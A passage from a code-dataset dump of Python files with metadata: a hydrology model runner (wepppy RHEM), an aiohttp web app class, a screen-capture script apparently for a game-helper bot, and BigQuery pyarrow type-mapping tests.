as_completed, wait, FIRST_EXCEPTION\n\nfrom datetime import datetime\nimport time\n\nimport pickle\n\nfrom glob import glob\n\nimport shutil\n\n# non-standard\nimport jsonpickle\n\nimport numpy as np\n\nfrom osgeo import osr\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\n\nimport wepppy\n\n# wepppy\n\nfrom wepppy.rhem import make_parameter_file, make_hillslope_run, run_hillslope\n\nfrom wepppy.climates.cligen import ClimateFile\n\nfrom wepppy.wepp.stats import ChannelWatbal, HillslopeWatbal, ReturnPeriods, SedimentDelivery\n\nfrom .rhempost import RhemPost\n\ntry:\n NCPU = int(os.environ['WEPPPY_NCPU'])\nexcept KeyError:\n NCPU = math.floor(multiprocessing.cpu_count() * 0.5)\n if NCPU < 1:\n NCPU = 1\n\n\nclass RhemNoDbLockedException(Exception):\n pass\n\n\nclass Rhem(NoDbBase, LogMixin):\n __name__ = 'Rhem'\n\n def __init__(self, wd, cfg_fn):\n super(Rhem, self).__init__(wd, cfg_fn)\n\n self.lock()\n\n # noinspection PyBroadException\n try:\n rhem_dir = self.rhem_dir\n if not _exists(rhem_dir):\n os.mkdir(rhem_dir)\n\n config = self.config\n self.clean()\n\n self.dump_and_unlock()\n\n except Exception:\n self.unlock('-f')\n raise\n\n @property\n def rhem_dir(self):\n return _join(self.wd, 'rhem')\n\n @property\n def runs_dir(self):\n return _join(self.wd, 'rhem', 'runs')\n\n @property\n def output_dir(self):\n return _join(self.wd, 'rhem', 'output')\n\n @property\n def status_log(self):\n return os.path.abspath(_join(self.runs_dir, 'status.log'))\n\n #\n # Required for NoDbBase Subclass\n #\n\n # noinspection PyPep8Naming\n @staticmethod\n def getInstance(wd):\n with open(_join(wd, 'rhem.nodb')) as fp:\n db = jsonpickle.decode(fp.read())\n assert isinstance(db, Rhem)\n\n if _exists(_join(wd, 'READONLY')):\n return db\n\n if os.path.abspath(wd) != os.path.abspath(db.wd):\n db.wd = wd\n db.lock()\n db.dump_and_unlock()\n\n return db\n\n @property\n def _nodb(self):\n return _join(self.wd, 'rhem.nodb')\n\n @property\n def _lock(self):\n return _join(self.wd, 'rhem.nodb.lock')\n\n @property\n def has_run(self):\n return len(glob(_join(self.output_dir, '*.sum'))) > 0\n\n #\n # hillslopes\n #\n def prep_hillslopes(self):\n self.log('Prepping Hillslopes... 
')\n wd = self.wd\n\n watershed = Watershed.getInstance(wd)\n\n soils = Soils.getInstance(wd)\n rangeland_covers = RangelandCover.getInstance(wd)\n climate = Climate.getInstance(self.wd)\n cli_dir = self.cli_dir\n wat_dir = self.wat_dir\n runs_dir = self.runs_dir\n out_dir = self.output_dir\n\n for topaz_id, summary in watershed.sub_iter():\n mukey = soils.domsoil_d[topaz_id]\n soil_texture = soils.soils[mukey].texture\n slp_fn = _join(wat_dir, 'hill_{}.slp'.format(topaz_id))\n slp = SlopeFile(slp_fn)\n cover = rangeland_covers.covers[topaz_id]\n\n scn_name = 'hill_{}'.format(topaz_id)\n par_fn = make_parameter_file(scn_name=scn_name,\n out_dir=runs_dir,\n soil_texture=soil_texture,\n moisture_content=0.25,\n bunchgrass_cover=cover['bunchgrass'],\n forbs_cover=cover['forbs'],\n shrubs_cover=cover['shrub'],\n sodgrass_cover=cover['sodgrass'],\n rock_cover=cover['rock'],\n basal_cover=cover['basal'],\n litter_cover=cover['litter'],\n cryptogams_cover=cover['cryptogams'],\n slope_length=slp.length,\n slope_steepness=slp.slope_scalar,\n sl=slp.slopes,\n sx=slp.distances,\n width=summary.width,\n model_version='WEPPcloud')\n\n stm_fn = _join(runs_dir, 'hill_{}.stm'.format(topaz_id))\n\n cli_summary = climate.sub_summary(topaz_id)\n cli_path = _join(cli_dir, cli_summary['cli_fn'])\n climate_file = ClimateFile(cli_path)\n climate_file.make_storm_file(stm_fn)\n\n run_fn = _join(runs_dir, 'hill_{}.run'.format(topaz_id))\n make_hillslope_run(run_fn, par_fn, stm_fn, _join(out_dir, 'hill_{}.sum'.format(topaz_id)), scn_name)\n\n self.log_done()\n\n def clean(self):\n if _exists(self.status_log):\n os.remove(self.status_log)\n\n runs_dir = self.runs_dir\n if _exists(runs_dir):\n shutil.rmtree(runs_dir)\n os.mkdir(runs_dir)\n\n output_dir = self.output_dir\n if _exists(output_dir):\n shutil.rmtree(output_dir)\n os.mkdir(output_dir)\n\n def run_hillslopes(self):\n self.log('Running Hillslopes\\n')\n watershed = Watershed.getInstance(self.wd)\n runs_dir = os.path.abspath(self.runs_dir)\n\n pool = ThreadPoolExecutor(NCPU)\n futures = []\n\n def oncomplete(rhemrun):\n status, _id, elapsed_time = rhemrun.result()\n assert status\n self.log(' {} completed run in {}s\\n'.format(_id, elapsed_time))\n\n sub_n = watershed.sub_n\n for i, (topaz_id, _) in enumerate(watershed.sub_iter()):\n self.log(' submitting topaz={} (hill {} of {})\\n'.format(topaz_id, i + 1, sub_n))\n futures.append(pool.submit(lambda p: run_hillslope(*p), (topaz_id, runs_dir)))\n futures[-1].add_done_callback(oncomplete)\n\n wait(futures, return_when=FIRST_EXCEPTION)\n\n self.log('Running RhemPost... 
')\n rhempost = RhemPost.getInstance(self.wd)\n rhempost.run_post()\n\n try:\n from wepppy.weppcloud import RunStatistics\n rs = RunStatistics.getInstance('/geodata/weppcloud_runs')\n rs.increment_hillruns(watershed.config_stem, watershed.sub_n)\n except Exception:\n pass\n\n self.log_done()\n\n def report_loss(self):\n output_dir = self.output_dir\n\n raise NotImplementedError\n\n def report_return_periods(self):\n output_dir = self.output_dir\n\n raise NotImplementedError\n", "sub_path": "wepppy/nodb/mods/rhem/rhem.py", "file_name": "rhem.py", "file_ext": "py", "file_size_in_byte": 8197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 94, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 96, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 96, "usage_type": "call"}, {"api_name": "wepppy.nodb.base.NoDbBase", "line_number": 105, "usage_type": "name"}, {"api_name": "wepppy.nodb.log_mixin.LogMixin", "line_number": 105, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "jsonpickle.decode", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed.getInstance", "line_number": 184, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed", "line_number": 184, "usage_type": "name"}, {"api_name": "wepppy.nodb.soils.Soils.getInstance", "line_number": 186, "usage_type": "call"}, {"api_name": "wepppy.nodb.soils.Soils", "line_number": 186, "usage_type": "name"}, {"api_name": "wepppy.nodb.mods.RangelandCover.getInstance", "line_number": 187, "usage_type": "call"}, {"api_name": "wepppy.nodb.mods.RangelandCover", "line_number": 187, "usage_type": "name"}, {"api_name": "wepppy.nodb.climate.Climate.getInstance", "line_number": 188, "usage_type": "call"}, {"api_name": "wepppy.nodb.climate.Climate", "line_number": 188, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 197, "usage_type": "call"}, {"api_name": "wepppy.watershed_abstraction.SlopeFile", "line_number": 198, "usage_type": "call"}, {"api_name": "wepppy.rhem.make_parameter_file", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, 
"usage_type": "call"}, {"api_name": "wepppy.climates.cligen.ClimateFile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "wepppy.rhem.make_hillslope_run", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 234, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 238, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 239, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 243, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 244, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 245, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed.getInstance", "line_number": 249, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed", "line_number": 249, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path", "line_number": 250, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 252, "usage_type": "call"}, {"api_name": "wepppy.rhem.run_hillslope", "line_number": 263, "usage_type": "call"}, {"api_name": "concurrent.futures.wait", "line_number": 266, "usage_type": "call"}, {"api_name": "concurrent.futures.FIRST_EXCEPTION", "line_number": 266, "usage_type": "name"}, {"api_name": "rhempost.RhemPost.getInstance", "line_number": 269, "usage_type": "call"}, {"api_name": "rhempost.RhemPost", "line_number": 269, "usage_type": "name"}, {"api_name": "rhempost.run_post", "line_number": 270, "usage_type": "call"}, {"api_name": "wepppy.weppcloud.RunStatistics.getInstance", "line_number": 274, "usage_type": "call"}, {"api_name": "wepppy.weppcloud.RunStatistics", "line_number": 274, "usage_type": "name"}]} +{"seq_id": "157211523", "text": "from aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\n\n\nclass WebApplication(web.Application):\n def __init__(self, bot, *args, **kwargs):\n super().__init__(\n middlewares=[web.normalize_path_middleware()],\n *args, **kwargs\n )\n self.bot = bot\n\n self.add_routes([web.static(\"/static\", \"./static\")])\n aiohttp_jinja2.setup(self, loader=jinja2.FileSystemLoader('./templates'))\n\n async def start(self, *args, **kwargs):\n runner = web.AppRunner(self)\n await runner.setup()\n site = web.TCPSite(runner, *args, **kwargs)\n await site.start()\n", "sub_path": "discord_pay/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.web.Application", "line_number": 6, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 6, "usage_type": "name"}, {"api_name": "aiohttp.web.normalize_path_middleware", "line_number": 9, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 9, "usage_type": "name"}, {"api_name": "aiohttp.web.static", "line_number": 14, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 14, "usage_type": "name"}, {"api_name": "aiohttp_jinja2.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 15, "usage_type": "call"}, {"api_name": "aiohttp.web.AppRunner", "line_number": 18, 
"usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 18, "usage_type": "name"}, {"api_name": "aiohttp.web.TCPSite", "line_number": 20, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "343065298", "text": "from skimage.metrics import structural_similarity\nfrom os.path import exists\nfrom os import listdir\nfrom os.path import isfile, join\nfrom pyautogui import *\nfrom pynput import keyboard\nfrom libs.resources_new import data\nfrom libs.resources_new import monitor_settings\n\nimport time\nimport pyautogui\n\nimport os\nimport mss\nimport mss.tools\nimport math\nimport pyperclip\n\n# myScreenshot = pyautogui.screenshot()\n# myScreenshot.save(r'file name.png')\n\nif (os.name == \"posix\"):\n from AppKit import NSScreen\n from AppKit import NSWorkspace\nelse:\n import win32gui\n from win32api import GetSystemMetrics\n\n\ncombat = False\ndebug = False\nmill = False\ndprint = False\npause = True\nwow_class = \"warrior\"\nwow_class_loaded = wow_class\n\nif os.name == \"posix\":\n screen_width = NSScreen.mainScreen().frame().size.width\n screen_height = NSScreen.mainScreen().frame().size.height\nelse:\n screen_width = GetSystemMetrics(0)\n screen_height = GetSystemMetrics(1)\n\nmonitor = str(screen_width)\n\nx = monitor_settings[monitor][\"x\"]\ny = monitor_settings[monitor][\"y\"]\nc_width = monitor_settings[monitor][\"c_width\"]\nc_height = monitor_settings[monitor][\"c_height\"]\np_offgcd_left = monitor_settings[monitor][\"p_offgcd_left\"]\np_combat_left = monitor_settings[monitor][\"p_combat_left\"]\np_interrupt_left = monitor_settings[monitor][\"p_interrupt_left\"]\np_behind_left = monitor_settings[monitor][\"p_behind_left\"]\np_clss_left = monitor_settings[monitor][\"p_clss_left\"]\n\nfile_path = os.path.abspath(__file__)\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nif os.name == \"posix\":\n abilities_folder = dir_path + \"/images/\" + monitor\n slash = \"/\"\nelse:\n abilities_folder = dir_path + \"\\images\\\\\" + monitor\n slash = \"\\\\\"\n\nif not os.path.exists(abilities_folder):\n os.makedirs(abilities_folder)\n\n\nskills_loaded = \"warrior\"\nprint(\"Script loaded and ready.\", \"Monitor:\", screen_width, screen_height, os.name)\n\n\ndef on_press(key):\n global debug, dprint, pause, mill\n\n try:\n if key == keyboard.Key.f12:\n debug = not debug\n print(\"debug:\", debug)\n except:\n return\n\n\ndef parse_hex_color(string):\n if string.startswith(\"#\"):\n string = string[1:]\n r = int(string[0:2], 16) # red color value\n g = int(string[2:4], 16) # green color value\n b = int(string[4:6], 16) # blue color value\n return r, g, b\n\n\ndef color_similarity(base_col_val, oth_col_val):\n return math.sqrt(sum((base_col_val[i]-oth_col_val[i])**2 for i in range(3)))\n\n\ndef print_debug(no, xclass, skill, image):\n # no = '{0: <4}'.format(no)\n # xclass = '{0: <15}'.format(xclass)\n # skill = '{0: <25}'.format(skill)\n # image = '{0: <100}'.format(image)\n print(no, xclass, skill)\n\n\nclasses = {\n \"warrior\", \"druid\", \"rogue\", \"warlock\", \"mage\", \"hunter\", \"death knight\", \"priest\", \"paladin\", \"shaman\"\n}\n\ntime1 = 0.2\ntime2 = 0.1\n\ncount = 0\nnumber = 0\n\ns, t = \"\", \"\"\ncolor_distance = 10\n\n\ndef get_class(clss, color_distance):\n found_class = False\n global wow_class\n for item in data[\"colors\"]:\n for c in data[\"colors\"][item]:\n rgb = parse_hex_color(c)\n if color_similarity(rgb, clss) <= color_distance:\n found_class = True\n wow_class = item\n\n return 
found_class, wow_class\n\n\ndebug_folder = dir_path + \"/images/_/\"\nx = 100\ny = 100\nwith keyboard.Listener(on_press=on_press) as listener:\n\n with mss.mss() as sct:\n\n while True:\n time.sleep(1)\n\n p_main = {\"top\": 1000, \"left\": 500, \"width\": x, \"height\": y}\n # p_secondary = {\"top\": 2, \"left\": p_offgcd_left, \"width\": x, \"height\": y}\n\n if debug:\n print({\"top\": screen_width-(x/2), \"left\": screen_height-(y/2), \"width\": x, \"height\": y}, screen_width, screen_height)\n main_image = sct.grab(p_main)\n # secondary_iamge = sct.grab(p_secondary)\n mss.tools.to_png(main_image.rgb, main_image.size, output=debug_folder + \"99. main.png\".format(**p_main))\n # mss.tools.to_png(secondary_iamge.rgb, secondary_iamge.size, output=debug_folder + \"100. secondary.png\".format(**p_secondary))\n", "sub_path": "_robot/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.name", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 38, "usage_type": "attribute"}, {"api_name": "AppKit.NSScreen.mainScreen", "line_number": 39, "usage_type": "call"}, {"api_name": "AppKit.NSScreen", "line_number": 39, "usage_type": "name"}, {"api_name": "AppKit.NSScreen.mainScreen", "line_number": 40, "usage_type": "call"}, {"api_name": "AppKit.NSScreen", "line_number": 40, "usage_type": "name"}, {"api_name": "win32api.GetSystemMetrics", "line_number": 42, "usage_type": "call"}, {"api_name": "win32api.GetSystemMetrics", "line_number": 43, "usage_type": "call"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 47, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 48, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 49, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 50, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 51, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 52, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 53, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 54, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 55, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "os.name", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 79, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "libs.resources_new.data", "line_number": 124, "usage_type": "name"}, {"api_name": 
"libs.resources_new.data", "line_number": 125, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 137, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 137, "usage_type": "name"}, {"api_name": "mss.mss", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 142, "usage_type": "call"}, {"api_name": "mss.tools.to_png", "line_number": 151, "usage_type": "call"}, {"api_name": "mss.tools", "line_number": 151, "usage_type": "attribute"}]} +{"seq_id": "218549083", "text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport decimal\nimport functools\nimport warnings\n\ntry:\n import pandas\nexcept ImportError: # pragma: NO COVER\n pandas = None\ntry:\n import pyarrow\n import pyarrow.types\nexcept ImportError: # pragma: NO COVER\n pyarrow = None\nimport pytest\nimport pytz\n\nfrom google.cloud.bigquery import schema\n\n\n@pytest.fixture\ndef module_under_test():\n from google.cloud.bigquery import _pandas_helpers\n\n return _pandas_helpers\n\n\ndef is_none(value):\n return value is None\n\n\ndef is_datetime(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#datetime-type\n return all_(\n pyarrow.types.is_timestamp,\n lambda type_: type_.unit == \"us\",\n lambda type_: type_.tz is None,\n )(type_)\n\n\ndef is_numeric(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type\n return all_(\n pyarrow.types.is_decimal,\n lambda type_: type_.precision == 38,\n lambda type_: type_.scale == 9,\n )(type_)\n\n\ndef is_timestamp(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#timestamp-type\n return all_(\n pyarrow.types.is_timestamp,\n lambda type_: type_.unit == \"us\",\n lambda type_: type_.tz == \"UTC\",\n )(type_)\n\n\ndef do_all(functions, value):\n return all((func(value) for func in functions))\n\n\ndef all_(*functions):\n return functools.partial(do_all, functions)\n\n\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_is_datetime():\n assert is_datetime(pyarrow.timestamp(\"us\", tz=None))\n assert not is_datetime(pyarrow.timestamp(\"ms\", tz=None))\n assert not is_datetime(pyarrow.timestamp(\"us\", tz=\"UTC\"))\n assert not is_datetime(pyarrow.string())\n\n\ndef test_do_all():\n assert do_all((lambda _: True, lambda _: True), None)\n assert not do_all((lambda _: True, lambda _: False), None)\n assert not do_all((lambda _: False,), None)\n\n\ndef test_all_():\n assert all_(lambda _: True, lambda _: True)(None)\n assert not all_(lambda _: True, lambda _: False)(None)\n\n\n@pytest.mark.parametrize(\n \"bq_type,bq_mode,is_correct_type\",\n [\n (\"STRING\", \"NULLABLE\", pyarrow.types.is_string),\n (\"STRING\", None, pyarrow.types.is_string),\n (\"string\", \"NULLABLE\", pyarrow.types.is_string),\n (\"StRiNg\", \"NULLABLE\", pyarrow.types.is_string),\n (\"BYTES\", \"NULLABLE\", pyarrow.types.is_binary),\n (\"INTEGER\", 
\"NULLABLE\", pyarrow.types.is_int64),\n (\"INT64\", \"NULLABLE\", pyarrow.types.is_int64),\n (\"FLOAT\", \"NULLABLE\", pyarrow.types.is_float64),\n (\"FLOAT64\", \"NULLABLE\", pyarrow.types.is_float64),\n (\"NUMERIC\", \"NULLABLE\", is_numeric),\n (\"BOOLEAN\", \"NULLABLE\", pyarrow.types.is_boolean),\n (\"BOOL\", \"NULLABLE\", pyarrow.types.is_boolean),\n (\"TIMESTAMP\", \"NULLABLE\", is_timestamp),\n (\"DATE\", \"NULLABLE\", pyarrow.types.is_date32),\n (\"TIME\", \"NULLABLE\", pyarrow.types.is_time64),\n (\"DATETIME\", \"NULLABLE\", is_datetime),\n (\"GEOGRAPHY\", \"NULLABLE\", pyarrow.types.is_string),\n (\"UNKNOWN_TYPE\", \"NULLABLE\", is_none),\n # Use pyarrow.list_(item_type) for repeated (array) fields.\n (\n \"STRING\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"STRING\",\n \"repeated\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"STRING\",\n \"RePeAtEd\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\n \"BYTES\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_binary(type_.value_type),\n ),\n ),\n (\n \"INTEGER\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_int64(type_.value_type),\n ),\n ),\n (\n \"INT64\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_int64(type_.value_type),\n ),\n ),\n (\n \"FLOAT\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_float64(type_.value_type),\n ),\n ),\n (\n \"FLOAT64\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_float64(type_.value_type),\n ),\n ),\n (\n \"NUMERIC\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_numeric(type_.value_type)),\n ),\n (\n \"BOOLEAN\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_boolean(type_.value_type),\n ),\n ),\n (\n \"BOOL\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_boolean(type_.value_type),\n ),\n ),\n (\n \"TIMESTAMP\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_timestamp(type_.value_type)),\n ),\n (\n \"DATE\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_date32(type_.value_type),\n ),\n ),\n (\n \"TIME\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_time64(type_.value_type),\n ),\n ),\n (\n \"DATETIME\",\n \"REPEATED\",\n all_(pyarrow.types.is_list, lambda type_: is_datetime(type_.value_type)),\n ),\n (\n \"GEOGRAPHY\",\n \"REPEATED\",\n all_(\n pyarrow.types.is_list,\n lambda type_: pyarrow.types.is_string(type_.value_type),\n ),\n ),\n (\"RECORD\", \"REPEATED\", is_none),\n (\"UNKNOWN_TYPE\", \"REPEATED\", is_none),\n ],\n)\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type(module_under_test, bq_type, bq_mode, is_correct_type):\n field = schema.SchemaField(\"ignored_name\", bq_type, mode=bq_mode)\n actual = module_under_test.bq_to_arrow_data_type(field)\n assert is_correct_type(actual)\n\n\n@pytest.mark.parametrize(\"bq_type\", [\"RECORD\", \"record\", \"STRUCT\", \"struct\"])\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type_w_struct(module_under_test, bq_type):\n fields = (\n schema.SchemaField(\"field01\", \"STRING\"),\n 
schema.SchemaField(\"field02\", \"BYTES\"),\n schema.SchemaField(\"field03\", \"INTEGER\"),\n schema.SchemaField(\"field04\", \"INT64\"),\n schema.SchemaField(\"field05\", \"FLOAT\"),\n schema.SchemaField(\"field06\", \"FLOAT64\"),\n schema.SchemaField(\"field07\", \"NUMERIC\"),\n schema.SchemaField(\"field08\", \"BOOLEAN\"),\n schema.SchemaField(\"field09\", \"BOOL\"),\n schema.SchemaField(\"field10\", \"TIMESTAMP\"),\n schema.SchemaField(\"field11\", \"DATE\"),\n schema.SchemaField(\"field12\", \"TIME\"),\n schema.SchemaField(\"field13\", \"DATETIME\"),\n schema.SchemaField(\"field14\", \"GEOGRAPHY\"),\n )\n field = schema.SchemaField(\"ignored_name\", bq_type, mode=\"NULLABLE\", fields=fields)\n actual = module_under_test.bq_to_arrow_data_type(field)\n expected = pyarrow.struct(\n (\n pyarrow.field(\"field01\", pyarrow.string()),\n pyarrow.field(\"field02\", pyarrow.binary()),\n pyarrow.field(\"field03\", pyarrow.int64()),\n pyarrow.field(\"field04\", pyarrow.int64()),\n pyarrow.field(\"field05\", pyarrow.float64()),\n pyarrow.field(\"field06\", pyarrow.float64()),\n pyarrow.field(\"field07\", module_under_test.pyarrow_numeric()),\n pyarrow.field(\"field08\", pyarrow.bool_()),\n pyarrow.field(\"field09\", pyarrow.bool_()),\n pyarrow.field(\"field10\", module_under_test.pyarrow_timestamp()),\n pyarrow.field(\"field11\", pyarrow.date32()),\n pyarrow.field(\"field12\", module_under_test.pyarrow_time()),\n pyarrow.field(\"field13\", module_under_test.pyarrow_datetime()),\n pyarrow.field(\"field14\", pyarrow.string()),\n )\n )\n assert pyarrow.types.is_struct(actual)\n assert actual.num_children == len(fields)\n assert actual.equals(expected)\n\n\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_bq_to_arrow_data_type_w_struct_unknown_subfield(module_under_test):\n fields = (\n schema.SchemaField(\"field1\", \"STRING\"),\n schema.SchemaField(\"field2\", \"INTEGER\"),\n # Don't know what to convert UNKNOWN_TYPE to, let type inference work,\n # instead.\n schema.SchemaField(\"field3\", \"UNKNOWN_TYPE\"),\n )\n field = schema.SchemaField(\"ignored_name\", \"RECORD\", mode=\"NULLABLE\", fields=fields)\n actual = module_under_test.bq_to_arrow_data_type(field)\n assert actual is None\n\n\n@pytest.mark.parametrize(\n \"bq_type,rows\",\n [\n (\"STRING\", [\"abc\", None, \"def\", None]),\n (\"BYTES\", [b\"abc\", None, b\"def\", None]),\n (\"INTEGER\", [123, None, 456, None]),\n (\"INT64\", [-9223372036854775808, None, 9223372036854775807, 123]),\n (\"FLOAT\", [1.25, None, 3.5, None]),\n (\n \"NUMERIC\",\n [\n decimal.Decimal(\"-99999999999999999999999999999.999999999\"),\n None,\n decimal.Decimal(\"99999999999999999999999999999.999999999\"),\n decimal.Decimal(\"999.123456789\"),\n ],\n ),\n (\"BOOLEAN\", [True, None, False, None]),\n (\"BOOL\", [False, None, True, None]),\n # TODO: Once https://issues.apache.org/jira/browse/ARROW-5450 is\n # resolved, test with TIMESTAMP column. 
